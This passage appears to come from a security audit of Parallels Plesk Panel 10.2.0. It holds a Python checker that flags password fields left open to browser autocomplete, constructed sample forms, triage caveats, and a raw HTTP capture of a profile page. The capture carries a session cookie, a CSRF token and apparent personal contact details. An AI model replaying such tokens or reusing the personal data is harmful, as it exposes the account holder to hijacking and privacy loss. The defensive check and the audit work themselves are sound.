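def find_autocomplete_password_fields(html, page_url=None):
    """Return one dict per password field that is not autocomplete="off"."""
    checker = PasswordAutocompleteChecker(page_url)
    checker.feed(html)
    checker.close()
    return checker.findings


# Constructed sample 1: the ODBC DSN form from finding 6.2, reduced to the
# inputs that matter for this check.
ODBC_FORM = """
<form action="/plesk/client@2/domain@1/odbc/dsn@1/properties/" method="post" enctype="multipart/form-data" >
<input type="text" name="SERVER" value="(local)" >
<input type="text" name="UID" value="" >
<input type="password" name="PWD" value="" >
<input type="hidden" name="cmd" value="update">
</form>
"""

# Constructed sample 2: an assumed fix (not a Plesk change). The form-level
# attribute already covers PWD; the per-field one is belt and braces.
ODBC_FORM_HARDENED = """
<form action="/plesk/client@2/domain@1/odbc/dsn@1/properties/" method="post" autocomplete="off">
<input type="text" name="UID" value="">
<input type="password" name="PWD" value="" autocomplete="off">
</form>
"""

# Constructed sample 3: modelled on the action="" profile form in finding 6.3.
# The field names are assumptions; the report excerpt does not show them.
PROFILE_FORM = """
<form id="form-user" enctype="application/x-www-form-urlencoded" action="" method="post">
<input type="password" name="general[password]" value="" class="input-text" />
<input type="password" name="general[passwordConfirmation]" value="" class="input-text" />
</form>
"""


def run_demo():
    """Run the check over the three samples and return the findings by name."""
    return {
        "odbc": find_autocomplete_password_fields(ODBC_FORM),
        "odbc_hardened": find_autocomplete_password_fields(ODBC_FORM_HARDENED),
        "profile": find_autocomplete_password_fields(PROFILE_FORM, page_url="/smb/my-profile"),
    }


if __name__ == "__main__":
    for name, findings in run_demo().items():
        print(name, findings)
```

Two caveats for anyone triaging these findings. First, the Low severity is right: current Chrome and Firefox ignore autocomplete="off" on login fields and offer to save the password anyway, so the attribute only helps on older browsers and is no substitute for not leaving a panel session open on a shared workstation. Second, the check is deliberately about the markup as served; a password input injected later by script (the Jsw widgets on these pages build parts of the DOM client-side) will not be seen by a parser that only reads the HTTP response body.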

Request

GET /smb/my-profile HTTP/1.1
Host: vulnerable.plesk.control.panel.20110407.20:8880
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PLESKSESSID=17161f28b87a6960fb097d11330c9c53; no_frames_root_page=deleted; locale=en-US; no_frames_logout_page=deleted; no_frames=deleted; no_frames_login_page=deleted;

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Mon, 23 May 2011 18:22:32 GMT
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
X-Powered-By: ASP.NET
Date: Mon, 23 May 2011 18:22:32 GMT
Connection: close
Content-Length: 41318

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta http-equiv="X-UA-Compatible" content="IE=7" />
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta name="forgery_protection_token" id="forgery_protection_token" content="3e86204e9517123c7f585d736d64aa3f" />

<link rel="shortcut icon" href="/favicon.ico" type="image/x-icon" />
<link rel="icon" href="/favicon.ico" type="image/ico" />







<link href="/skins/default/css/common/base.css?1297698230" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/common/btns.css?1297272602" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/customer/main.css?1297272602" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/customer/custom.css?1274451258" media="screen" rel="stylesheet" type="text/css" />
<!--[if lte IE 7]> <link href="/skins/default/css/common/ie.css?1296843248" media="screen" rel="stylesheet" type="text/css" /><![endif]-->
<!--[if IE 8]> <link href="/skins/default/css/common/ie8.css?1269638970" media="screen" rel="stylesheet" type="text/css" /><![endif]-->
<script type="text/javascript" src="/smb/externals/prototype.js?1302230704"></script>
<script type="text/javascript" src="/javascript/jsw.js?1302230642"></script>
<script type="text/javascript" src="/smb/scripts/smb.js?1302230704"></script>
<title>My Profile - Parallels Plesk Panel 10.2.0 for Microsoft Windows</title>
<script type="text/javascript">
Jsw.baseUrl = '/smb';
Jsw.skinUrl = '/skins/default';
Jsw.showErrorDetails = false;
</script>

<script type="text/javascript">
// hide navigation if panel shown inside frame
if (top != self) {
var head = document.getElementsByTagName('head')[0];

var stylesheet = document.createElement('link');
stylesheet.type = 'text/css';
stylesheet.rel = 'stylesheet';
stylesheet.href = '/skins/default/css/customer/content-only.css?1286484958';
stylesheet.media = 'screen';

head.appendChild(stylesheet);
}
</script>
</head>
<body class="">
<div class="tooltip" style="display: none;"><b><i><i><i><span></span></i></i></i></b></div>

<div id="page">

<div id="wrapper">
<div id="top-wrapper" class="l-top">
<div id="top">
<div id="header-wrapper">
<div id="header">
<h1 class="logo">
<img src="/skins/default/plesk/images/def_plesk_logo.gif?1274455768" alt="Parallels Plesk Panel 10.2.0 for Microsoft Windows" />
</h1>
<div class="shortcuts">
<ul>
<li class="top-user-info">
<table cellspacing="0">
<tr>
<th>Logged in as</th>
<td>
<b>
<a href="/smb/my-profile">
Hoyt LLC Research </a>
</b>
</td>
</tr>
<tr>
<th>Subscription</th>
<td><div id="subscription-switch"></div></td>
</tr>
</table>
</li>
<li class="top-logout">
<a href="/smb/auth/logout" id="shortcutLogout"><i><span>
Log out </span></i></a>
</li>
<li class="top-help">
<a href="/smb/help/redirect/controller-name/my-profile/action-name/index" target="help"><i><span>
Help </span></i></a>
</li>
</ul>
</div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Smb.SubscriptionDropdown({
applyTo: 'subscription-switch',
items: [{"value":"\/account\/switch\/id\/1","title":"vulnerable.host.fqdn"}],
title: 'vulnerable.host.fqdn',
onChange: function(dropdown, item) {
window.location.href = Jsw.baseUrl + item.value
+ '?returnUrl=' + '%2Fmy-profile' + '&activeModule=' + '' }
});
});
//]]>
</script> </div>
</div>
</div>
<div id="navbar"></div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Smb.NavigationTabs({
id: 'navbar',
applyTo: 'navbar',
items: [{"componentType":"Jsw.bar.Button","title":"Home","href":"\/admin-home","containerCls":"","addCls":"nav-home"},{"componentType":"Jsw.bar.Button","title":"Users","href":"\/user\/list","containerCls":"","addCls":"nav-users"},{"componentType":"Jsw.bar.Button","title":"Mail","href":"\/email-address","containerCls":"","addCls":"nav-mail"},{"componentType":"Jsw.bar.Button","title":"Websites &amp; Domains","href":"\/web\/view","containerCls":"","addCls":"nav-sites"},{"componentType":"Jsw.bar.Button","title":"Applications","href":"\/app","containerCls":"","addCls":"nav-apps"},{"componentType":"Jsw.bar.Button","title":"Statistics","href":"\/statistics","containerCls":"","addCls":"nav-statistics"},{"componentType":"Jsw.bar.Button","title":"Account","href":"\/account","containerCls":"","addCls":"nav-account"}] });
});
//]]>
</script>
</div>
<div id="content-wrapper">
<div id="content">

<div id="pathbar-wrapper"></div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Jsw.Pathbar({
id: 'pathbar',
cls: 'pathbar clearfix',
renderTo: 'pathbar-wrapper',
items: [] });
});
//]]>
</script>

<div class="heading no-border">
<div class="heading-area">
<div class="toolbar">
<span id="toolbar-content"></span>
</div>
<h2><span>My Profile</span></h2>
</div>
</div>


<div id="content-body" class="clearfix">
<div id="main">

<form id="form-user" enctype="application/x-www-form-urlencoded" action="" method="post"><div id='form-tab-buttons' class='tabs'></div><script type='text/javascript'>
Jsw.onReady(function() {
new Jsw.bar.Tabs({
type: 'dynamic',
applyTo: 'form-tab-buttons',
items: [{"componentType":"Jsw.bar.Button","title":"General","tabId":"tab-general","containerCls":"active"},{"componentType":"Jsw.bar.Button","title":"Contact Details","tabId":"tab-contacts","containerCls":""}]
});
});
</script>

<div id='tab-general' >

<div id='general-vcard' class='form-box' >
<div id='general-vcard-content-area'>

<div class='form-row'>
<div class='field-name'><label for='general-vcard-contactName'>Contact name&nbsp;</label></div>
<div class='field-value'>
<div class='text-value'>
<span id='general-vcard-contactName'>Hoyt LLC Research</span>

</div>
</div>
</div>
<div class="form-row">
<div class='field-name'>
<label for='general-vcard-email-emailType'>E-mail address&nbsp;</label> <span class="required">*</span>
</div>
<div class="field-value">
<div class="text-value">
<div class="indent-box">

<span><input type="radio" class="radio"
value="internal"
id="general-vcard-email-emailType-internal"
name="general[vcard][email][emailType]"
/></span>

<div class="indent-box-content">
<label for="general-vcard-email-emailType-internal">Create an e-mail address under your account</label>
<div class='form-row'>
<div>
<input type="text" name="general[vcard][email][internalEmail]" id="general-vcard-email-internalEmail" value="h02332" class="input-text" /> @<span id='general-vcard-email-internalEmail-domain'>vulnerable.host.fqdn</span></div>
<span class='field-errors'>
</span>
</div>
</div>

</div>
<div class="indent-box">

<span><input type="radio" class="radio"
value="external"
id="general-vcard-email-emailType-external"
name="general[vcard][email][emailType]"
checked="checked" /></span>

<div class="indent-box-content">
<label for="general-vcard-email-emailType-external">Use an external e-mail address</label>
<div class='form-row'>
<div>
<input type="text" name="general[vcard][email][externalEmail]" id="general-vcard-email-externalEmail" value="h02332@gmail.com" class="f-middle-size input-text" disabled="1" /></div>
<span class='field-errors'>
</span>
</div>
</div>

</div>
</div>
</div>
</div>

<script type="text/javascript">
//<![CDATA[
Smb.UserEmailForm = Class.create({

initialize: function(config) {
this._prefix = config['prefix'];
this._internalEmailId = this._prefix + config['internalEmailId'];
this._internalEmailElements = config['internalEmailElements'];
this._externalEmailId = this._prefix + config['externalEmailId'];
this._externalEmailElements = config['externalEmailElements'];
$(this._internalEmailId).observe('click', this._internalEmailOnClick.bind(this));
$(this._externalEmailId).observe('click', this._externalEmailOnClick.bind(this));
if ($(this._internalEmailId).checked) {
this._internalEmailOnClick();
} else {
   this._externalEmailOnClick();
}
},

_internalEmailOnClick: function() {
this._externalEmailElements.each(function(elementId) {
$(this._prefix + elementId).disable();
}, this);
this._internalEmailElements.each(function(elementId) {
$(this._prefix + elementId).enable();
}, this);
},

_externalEmailOnClick: function() {
this._internalEmailElements.each(function(elementId) {
$(this._prefix + elementId).disable();
}, this);
this._externalEmailElements.each(function(elementId) {
$(this._prefix + elementId).enable();
}, this);
}
});

Jsw.onReady(function() {
new Smb.UserEmailForm({
prefix: 'general-vcard-email-',
internalEmailId: 'emailType-internal',
internalEmailElements: ['internalEmail'
],
externalEmailId: 'emailType-external',
externalEmailElements: ['externalEmail']
});

});
//]]>
</script>

</div>
</div>
<script type='text/javascript'>
//<![CDATA[
Jsw.onReady(function() {
new Jsw.Panel({
title: 'General Information',
applyTo: 'general-vcard'
});
});
//]]>
</script>


<div id='general-account' class='form-box' >
<div id='general-account-content-area'>

<div class='form-row'>
<div class='field-name'><label for='general-account-login'>Username&nbsp;</label></div>
<div class='field-value'>
<div class='text-value'>
<span id='general-account-login'>xsscx</span>

</div>
</div>
</div>
<div id='general-account-password-form-row' class='form-row' >
<div class='field-name'><label for='general-account-password'>Password&nbsp;</label></div>
<div class='field-value'>

<input type="password" name="general[account][password]" id="general-account-password" value="" class="input-text" />
<span class='field-errors' style="display:none;"></span>

</div>
</div><script type='text/javascript'>
Jsw.onReady(function() {
var pswd = $('general-account-password');
new Jsw.PasswordMeter({
renderTo: 'general-account-password',
renderMode: 'after',
observe: 'general-account-password',
locale: {"title":"Password Strength","description":"To improve your password: ","passwordTooShort":"Make the password longer.","lettersLowerCase":"Use at least one lower-case character.","lettersUpperCase":"Use at least one upper-case character.","numbers1":"Use at least one number.","numbers3":"Use at least three numbers.","specialChar1":"Use at least one special character (for example: !, @, #, $, % ,^, &, *, ?, _, ~).","specialChar2":"Use at least two special characters (for example: !, @, #, $, %, ^, &, *, ?, _, ~).","comboUpperAndLower":"Use both upper and lower-case characters.","comboLettersAndNumbers":"Use both numbers and characters.","comboLettersNumbersSpecial":"Use numbers, characters and special characters.","yourPasswordIsStrong":"Your password is strong, but you can make it even stronger by increasing its length.","verdictNone":"Very weak","verdictVeryWeak":"Very weak","verdictWeak":"Weak","verdictMediocre":"Medium","verdictStrong":"Strong","verdictStronger":"Very strong"}
}).render();
});</script>
<div id='general-account-passwordConfirmation-form-row' class='form-row' >
<div class='field-name'><label for='general-account-passwordConfirmation'>Confirm password&nbsp;</label></div>
<div class='field-value'>

<input type="password" name="general[account][passwordConfirmation]" id="general-account-passwordConfirmation" value="" class="input-text" />
<span class='field-errors' style="display:none;"></span>

</div>
</div>
<div id='general-account-language-form-row' class='form-row' >
<div class='field-name'><label for='general-account-language'>Panel language&nbsp;</label></div>
<div class='field-value'>

<select name="general[account][language]" id="general-account-language">
<option value="en-US" label="ENGLISH (United States)" selected="selected">ENGLISH (United States)</option>
</select>
<span class='field-errors' style="display:none;"></span>

</div>
</div></div>
</div>
<script type='text/javascript'>
//<![CDATA[
Jsw.onReady(function() {
new Jsw.Panel({
title: 'Panel Preferences',
applyTo: 'general-account'
});
});
//]]>
</script>
</div>
<div id='tab-contacts' style="display: none;">

<div id='contacts-contactsSection' class='form-box' >
<div id='contacts-contactsSection-content-area'>
<div id='contacts-contactsSection-companyName-form-row' class='form-row' >
<div class='field-name'><label for='contacts-contactsSection-companyName'>Company name&nbsp;</label></div>
<div class='field-value'>

<input type="text" name="contacts[contactsSection][companyName]" id="contacts-contactsSection-companyName" value="Hoyt LLC Research" class="f-middle-size input-text" />
<span class='field-errors' style="display:none;"></span>

</div>
</div>
<div id='contacts-contactsSection-phone-form-row' class='form-row' >
<div class='field-name'><label for='contacts-contactsSection-phone'>Phone number&nbsp;<span class="required">*</span></label></div>
<div class='field-value'>

<input type="text" name="contacts[contactsSection][phone]" id="contacts-contactsSection-phone" value="+1 339 206 1886" class="f-middle-size input-text" />
<span class='field-errors' style="display:none;"></span>

</div>
</div>
<div id='contacts-contactsSection-fax-form-row' class='form-row' >
<div class='field-name'><label for='contacts-contactsSection-fax'>Fax number&nbsp;</label></div>
<div class='field-value'>

<input type="text" name="contacts[contactsSection][fax]" id="contacts-contactsSection-fax" value="" class="f-middle-size input-text" />
<span class='field-errors' style="display:none;"></span>

</div>
</div>
<div id='contacts-contactsSection-address-form-row' class='form-row' >
<div class='field-name'><label for='contacts-contactsSection-address'>Address&nbsp;</label></div>
<div class='field-value'>

<textarea name="contacts[contactsSection][address]" id="contacts-contactsSection-address" class="f-middle-size" rows="4" cols="80">PO BOX 250
</textarea>
<span class='field-errors' style="display:none;"></span>

</div>
</div>
<div id='contacts-contactsSection-city-form-row' class='form-row' >
<div class='field-name'><label for='contacts-contactsSection-city'>City&nbsp;</label></div>
<div class='field-value'>

<input type="text" name="contacts[contactsSection][city]" id="contacts-contactsSection-city" value="Accord" class="f-middle-size input-text" />
<span class='field-errors' style="display:none;"></span>

</div>
</div>
<div id='contacts-contactsSection-state-form-row' class='form-row' >
<div class='field-name'><label for='contacts-contactsSection-state'>State or province&nbsp;</label></div>
<div class='field-value'>

<input type="text" name="contacts[contactsSection][state]" id="contacts-contactsSection-state" value="MA" class="input-text" />
<span class='field-errors' style="display:none;"></span>

</div>
</div>
<div id='contacts-contactsSection-zip-form-row' class='form-row' >
<div class='field-name'><label for='contacts-contactsSection-zip'>Postal or ZIP code&nbsp;</label></div>
<div class='field-value'>

<input type="text" name="contacts[contactsSection][zip]" id="contacts-contactsSection-zip" value="02018" class="input-text" />
<span class='field-errors' style="display:none;"></span>

</div>
</div>
<div id='contacts-contactsSection-country-form-row' class='form-row' >
<div class='field-name'><label for='contacts-contactsSection-country'>Country&nbsp;</label></div>
<div class='field-value'>

<select name="contacts[contactsSection][country]" id="contacts-contactsSection-country">
<option value="AF" label="Afghanistan">Afghanistan</option>
<option value="AX" label="Åland Islands">Åland Islands</option>
<option value="AL" label="Albania">Albania</option>
<option value="DZ" label="Algeria">Algeria</option>
<option value="AS" label="American Samoa">American Samoa</option>
<option value="AD" label="Andorra">Andorra</option>
<option value="AO" label="Angola">Angola</option>
<option value="AI" label="Anguilla">Anguilla</option>
<option value="AQ" label="Antarctica">Antarctica</option>
<option value="AG" label="Antigua and Barbuda">Antigua and Barbuda</option>
<option value="AR" label="Argentina">Argentina</option>
<option value="AM" label="Armenia">Armenia</option>
<option value="AW" label="Aruba">Aruba</option>
<option value="AU" label="Australia">Australia</option>
<option value="AT" label="Austria">Austria</option>
<option value="AZ" label="Azerbaijan">Azerbaijan</option>
<option value="BS" label="Bahamas">Bahamas</option>
<option value="BH" label="Bahrain">Bahrain</option>
<option value="BD" label="Bangladesh">Bangladesh</option>
<option value="BB" label="Barbados">Barbados</option>
<option value="BY" label="Belarus">Belarus</option>
<option value="BE" label="Belgium">Belgium</option>
<option value="BZ" label="Belize">Belize</option>
<option value="BJ" label="Benin">Benin</option>
<option value="BM" label="Bermuda">Bermuda</option>
<option value="BT" label="Bhutan">Bhutan</option>
<option value="BO" label="Bolivia, Plurinational State of">Bolivia, Plurinational State of</option>
<option value="BA" label="Bosnia and Herzegovina">Bosnia and Herzegovina</option>
<option value="BW" label="Botswana">Botswana</option>
<option value="BV" label="Bouvet Island">Bouvet Island</option>
<option value="BR" label="Brazil">Brazil</option>
<option value="IO" label="British Indian Ocean Territory">British Indian Ocean Territory</option>
<option value="BN" label="Brunei Darussalam">Brunei Darussalam</option>
<option value="BG" label="Bulgaria">Bulgaria</option>
<option value="BF" label="Burkina Faso">Burkina Faso</option>
<option value="BI" label="Burundi">Burundi</option>
<option value="KH" label="Cambodia">Cambodia</option>
<option value="CM" label="Cameroon">Cameroon</option>
<option value="CA" label="Canada">Canada</option>
<option value="CV" label="Cape Verde">Cape Verde</option>
<option value="KY" label="Cayman Islands">Cayman Islands</option>
<option value="CF" label="Central African Republic">Central African Republic</option>
<option value="TD" label="Chad">Chad</option>
<option value="CL" label="Chile">Chile</option>
<option value="CN" label="China">China</option>
<option value="CX" label="Christmas Island">Christmas Island</option>
<option value="CC" label="Cocos (Keeling) Islands">Cocos (Keeling) Islands</option>
<option value="CO" label="Colombia">Colombia</option>
<option value="KM" label="Comoros">Comoros</option>
<option value="CG" label="Congo">Congo</option>
<option value="CD" label="Congo, the Democratic Republic of the">Congo, the Democratic Republic of the</option>
<option value="CK" label="Cook Islands">Cook Islands</option>
<option value="CR" label="Costa Rica">Costa Rica</option>
<option value="CI" label="Cote D'Ivoire">Cote D'Ivoire</option>
<option value="HR" label="Croatia">Croatia</option>
<option value="CU" label="Cuba">Cuba</option>
<option value="CY" label="Cyprus">Cyprus</option>
<option value="CZ" label="Czech Republic">Czech Republic</option>
<option value="DK" label="Denmark">Denmark</option>
<option value="DJ" label="Djibouti">Djibouti</option>
<option value="DM" label="Dominica">Dominica</option>
<option value="DO" label="Dominican Republic">Dominican Republic</option>
<option value="EC" label="Ecuador">Ecuador</option>
<option value="EG" label="Egypt">Egypt</option>
<option value="SV" label="El Salvador">El Salvador</option>
<option value="GQ" label="Equatorial Guinea">Equatorial Guinea</option>
<option value="ER" label="Eritrea">Eritrea</option>
<option value="EE" label="Estonia">Estonia</option>
<option value="ET" label="Ethiopia">Ethiopia</option>
<option value="FK" label="Falkland Islands (Malvinas)">Falkland Islands (Malvinas)</option>
<option value="FO" label="Faroe Islands">Faroe Islands</option>
<option value="FJ" label="Fiji">Fiji</option>
<option value="FI" label="Finland">Finland</option>
<option value="FR" label="France">France</option>
<option value="GF" label="French Guiana">French Guiana</option>
<option value="PF" label="French Polynesia">French Polynesia</option>
<option value="TF" label="French Southern Territories">French Southern Territories</option>
<option value="GA" label="Gabon">Gabon</option>
<option value="GM" label="Gambia">Gambia</option>
<option value="GE" label="Georgia">Georgia</option>
<option value="DE" label="Germany">Germany</option>
<option value="GH" label="Ghana">Ghana</option>
<option value="GI" label="Gibraltar">Gibraltar</option>
<option value="GR" label="Greece">Greece</option>
<option value="GL" label="Greenland">Greenland</option>
<option value="GD" label="Grenada">Grenada</option>
<option value="GP" label="Guadeloupe">Guadeloupe</option>
<option value="GU" label="Guam">Guam</option>
<option value="GT" label="Guatemala">Guatemala</option>
<option value="GG" label="Guernsey">Guernsey</option>
<option value="GN" label="Guinea">Guinea</option>
<option value="GW" label="Guinea-Bissau">Guinea-Bissau</option>
<option value="GY" label="Guyana">Guyana</option>
<option value="HT" label="Haiti">Haiti</option>
<option value="HM" label="Heard Island and McDonald Islands">Heard Island and McDonald Islands</option>
<option value="VA" label="Holy See (Vatican City State)">Holy See (Vatican City State)</option>
<option value="HN" label="Honduras">Honduras</option>
<option value="HK" label="Hong Kong">Hong Kong</option>
<option value="HU" label="Hungary">Hungary</option>
<option value="IS" label="Iceland">Iceland</option>
<option value="IN" label="India">India</option>
<option value="ID" label="Indonesia">Indonesia</option>
<option value="IR" label="Iran, Islamic Republic of">Iran, Islamic Republic of</option>
<option value="IQ" label="Iraq">Iraq</option>
<option value="IE" label="Ireland">Ireland</option>
<option value="IM" label="Isle of Man">Isle of Man</option>
<option value="IL" label="Israel">Israel</option>
<option value="IT" label="Italy">Italy</option>
<option value="JM" label="Jamaica">Jamaica</option>
<option value="JP" label="Japan">Japan</option>
<option value="JE" label="Jersey">Jersey</option>
<option value="JO" label="Jordan">Jordan</option>
<option value="KZ" label="Kazakhstan">Kazakhstan</option>
<option value="KE" label="Kenya">Kenya</option>
<option value="KI" label="Kiribati">Kiribati</option>
<option value="KP" label="Korea, Democratic People's Republic of">Korea, Democratic People's Republic of</option>
<option value="KR" label="Korea, Republic of">Korea, Republic of</option>
<option value="KW" label="Kuwait">Kuwait</option>
<option value="KG" label="Kyrgyzstan">Kyrgyzstan</option>
<option value="LA" label="Lao People's Democratic Republic">Lao People's Democratic Republic</option>
<option value="LV" label="Latvia">Latvia</option>
<option value="LB" label="Lebanon">Lebanon</option>
<option value="LS" label="Lesotho">Lesotho</option>
<option value="LR" label="Liberia">Liberia</option>
<option value="LY" label="Libyan Arab Jamahiriya">Libyan Arab Jamahiriya</option>
<option value="LI" label="Liechtenstein">Liechtenstein</option>
<option value="LT" label="Lithuania">Lithuania</option>
<option value="LU" label="Luxembourg">Luxembourg</option>
<option value="MO" label="Macao">Macao</option>
<option value="MK" label="Macedonia, the Former Yugoslav Republic of">Macedonia, the Former Yugoslav Republic of</option>
<option value="MG" label="Madagascar">Madagascar</option>
<option value="MW" label="Malawi">Malawi</option>
<option value="MY" label="Malaysia">Malaysia</option>
<option value="MV" label="Maldives">Maldives</option>
<option value="ML" label="Mali">Mali</option>
<option value="MT" label="Malta">Malta</option>
<option value="MH" label="Marshall Islands">Marshall Islands</option>
<option value="MQ" label="Martinique">Martinique</option>
<option value="MR" label="Mauritania">Mauritania</option>
<option value="MU" label="Mauritius">Mauritius</option>
<option value="YT" label="Mayotte">Mayotte</option>
<option value="MX" label="Mexico">Mexico</option>
<option value="FM" label="Micronesia, Federated States of">Micronesia, Federated States of</option>
<option value="MD" label="Moldova, Republic of">Moldova, Republic of</option>
<option value="MC" label="Monaco">Monaco</option>
<option value="MN" label="Mongolia">Mongolia</option>
<option value="ME" label="Montenegro">Montenegro</option>
<option value="MS" label="Montserrat">Montserrat</option>
<option value="MA" label="Morocco">Morocco</option>
<option value="MZ" label="Mozambique">Mozambique</option>
<option value="MM" label="Myanmar">Myanmar</option>
<option value="NA" label="Namibia">Namibia</option>
<option value="NR" label="Nauru">Nauru</option>
<option value="NP" label="Nepal">Nepal</option>
<option value="NL" label="Netherlands">Netherlands</option>
<option value="AN" label="Netherlands Antilles">Netherlands Antilles</option>
<option value="NC" label="New Caledonia">New Caledonia</option>
<option value="NZ" label="New Zealand">New Zealand</option>
<option value="NI" label="Nicaragua">Nicaragua</option>
<option value="NE" label="Niger">Niger</option>
<option value="NG" label="Nigeria">Nigeria</option>
<option value="NU" label="Niue">Niue</option>
<option value="NF" label="Norfolk Island">Norfolk Island</option>
<option value="MP" label="Northern Mariana Islands">Northern Mariana Islands</option>
<option value="NO" label="Norway">Norway</option>
<option value="OM" label="Oman">Oman</option>
<option value="PK" label="Pakistan">Pakistan</option>
<option value="PW" label="Palau">Palau</option>
<option value="PS" label="Palestinian Territory, Occupied">Palestinian Territory, Occupied</option>
<option value="PA" label="Panama">Panama</option>
<option value="PG" label="Papua New Guinea">Papua New Guinea</option>
<option value="PY" label="Paraguay">Paraguay</option>
<option value="PE" label="Peru">Peru</option>
<option value="PH" label="Philippines">Philippines</option>
<option value="PN" label="Pitcairn">Pitcairn</option>
<option value="PL" label="Poland">Poland</option>
<option value="PT" label="Portugal">Portugal</option>
<option value="PR" label="Puerto Rico">Puerto Rico</option>
<option value="QA" label="Qatar">Qatar</option>
<option value="RE" label="Reunion">Reunion</option>
<option value="RO" label="Romania">Romania</option>
<option value="RU" label="Russian Federation">Russian Federation</option>
<option value="RW" label="Rwanda">Rwanda</option>
<option value="BL" label="Saint Barthelemy">Saint Barthelemy</option>
<option value="SH" label="Saint Helena, Ascension and Tristan da Cunha">Saint Helena, Ascension and Tristan da Cunha</option>
<option value="KN" label="Saint Kitts and Nevis">Saint Kitts and Nevis</option>
<option value="LC" label="Saint Lucia">Saint Lucia</option>
<option value="MF" label="Saint Martin">Saint Martin</option>
<option value="PM" label="Saint Pierre and Miquelon">Saint Pierre and Miquelon</option>
<option value="VC" label="Saint Vincent and the Grenadines">Saint Vincent and the Grenadines</option>
<option value="WS" label="Samoa">Samoa</option>
<option value="SM" label="San Marino">San Marino</option>
<option value="ST" label="Sao Tome and Principe">Sao Tome and Principe</option>
<option value="SA" label="Saudi Arabia">Saudi Arabia</option>
<option value="SN" label="Senegal">Senegal</option>
<option value="RS" label="Serbia">Serbia</option>
<option value="SC" label="Seychelles">Seychelles</option>
<option value="SL" label="Sierra Leone">Sierra Leone</option>
<option value="SG" label="Singapore">Singapore</option>
<option value="SK" label="Slovakia">Slovakia</option>
<option value="SI" label="Slovenia">Slovenia</option>
<option value="SB" label="Solomon Islands">Solomon Islands</option>
<option value="SO" label="Somalia">Somalia</option>
<option value="ZA" label="South Africa">South Africa</option>
<option value="GS" label="South Georgia and the South Sandwich Islands">South Georgia and the South Sandwich Islands</option>
<option value="ES" label="Spain">Spain</option>
<option value="LK" label="Sri Lanka">Sri Lanka</option>
<option value="SD" label="Sudan">Sudan</option>
<option value="SR" label="Suriname">Suriname</option>
<option value="SJ" label="Svalbard and Jan Mayen">Svalbard and Jan Mayen</option>
<option value="SZ" label="Swaziland">Swaziland</option>
<option value="SE" label="Sweden">Sweden</option>
<option value="CH" label="Switzerland">Switzerland</option>
<option value="SY" label="Syrian Arab Republic">Syrian Arab Republic</option>
<option value="TW" label="Taiwan">Taiwan</option>
<option value="TJ" label="Tajikistan">Tajikistan</option>
<option value="TZ" label="Tanzania, United Republic of">Tanzania, United Republic of</option>
<option value="TH" label="Thailand">Thailand</option>
<option value="TL" label="Timor-Leste">Timor-Leste</option>
<option value="TG" label="Togo">Togo</option>
<option value="TK" label="Tokelau">Tokelau</option>
<option value="TO" label="Tonga">Tonga</option>
<option value="TT" label="Trinidad and Tobago">Trinidad and Tobago</option>
<option value="TN" label="Tunisia">Tunisia</option>
<option value="TR" label="Turkey">Turkey</option>
<option value="TM" label="Turkmenistan">Turkmenistan</option>
<option value="TC" label="Turks and Caicos Islands">Turks and Caicos Islands</option>
<option value="TV" label="Tuvalu">Tuvalu</option>
<option value="UG" label="Uganda">Uganda</option>
<option value="UA" label="Ukraine">Ukraine</option>
<option value="AE" label="United Arab Emirates">United Arab Emirates</option>
<option value="GB" label="United Kingdom">United Kingdom</option>
<option value="US" label="United States" selected="selected">United States</option>
<option value="UM" label="United States Minor Outlying Islands">United States Minor Outlying Islands</option>
<option value="UY" label="Uruguay">Uruguay</option>
<option value="UZ" label="Uzbekistan">Uzbekistan</option>
<option value="VU" label="Vanuatu">Vanuatu</option>
<option value="VE" label="Venezuela, Bolivarian Republic of">Venezuela, Bolivarian Republic of</option>
<option value="VN" label="Viet Nam">Viet Nam</option>
<option value="VG" label="Virgin Islands, British">Virgin Islands, British</option>
<option value="VI" label="Virgin Islands, U.S.">Virgin Islands, U.S.</option>
<option value="WF" label="Wallis and Futuna">Wallis and Futuna</option>
<option value="EH" label="Western Sahara">Western Sahara</option>
<option value="YE" label="Yemen">Yemen</option>
<option value="ZM" label="Zambia">Zambia</option>
<option value="ZW" label="Zimbabwe">Zimbabwe</option>
</select>
<span class='field-errors' style="display:none;"></span>

</div>
</div></div>
</div>
<script type='text/javascript'>
//<![CDATA[
Jsw.onReady(function() {
new Jsw.Panel({
title: '',
applyTo: 'contacts-contactsSection'
});
});
//]]>
</script>
</div>

<div class="btns-box">
<div class="box-area">
<div class="form-row">
<div class="field-name">
<span class="required">*</span>
Required fields </div>
<div class="field-value">

<span id='btn-send' class='btn'></span>
<script type='text/javascript'>
Jsw.onReady(function() {
new Jsw.CommandButton({
applyTo: 'btn-send',
title: 'OK',
cls: 'btn',
name: 'send',
value: '',
description: '',
disabled: false,
handler: function(event) { Jsw.submit(this); }
});
});
</script>

<span id='btn-cancel' class='btn'></span>
<script type='text/javascript'>
Jsw.onReady(function() {
new Jsw.CommandButton({
applyTo: 'btn-cancel',
title: 'Cancel',
cls: 'btn',
name: 'cancel',
value: '',
description: '',
disabled: false,
handler: function(event) { Jsw.redirect("/"); }
});
});
</script>

<input type="hidden" name="hidden" value="" id="hidden" />
<!-- ability to submit form via Enter -->
<input type="image" src="/skins/default/img/blank.gif" style="border: 0; height: 0; width: 0; position: absolute;" />
</div>
</div>
</div>
</div>

<input type="hidden" name="forgery_protection_token" value="3e86204e9517123c7f585d736d64aa3f" id="form_forgery_protection_token" /></form>
<script type='text/javascript'>
Jsw.onReady(function() {
new Jsw.FormAjax({
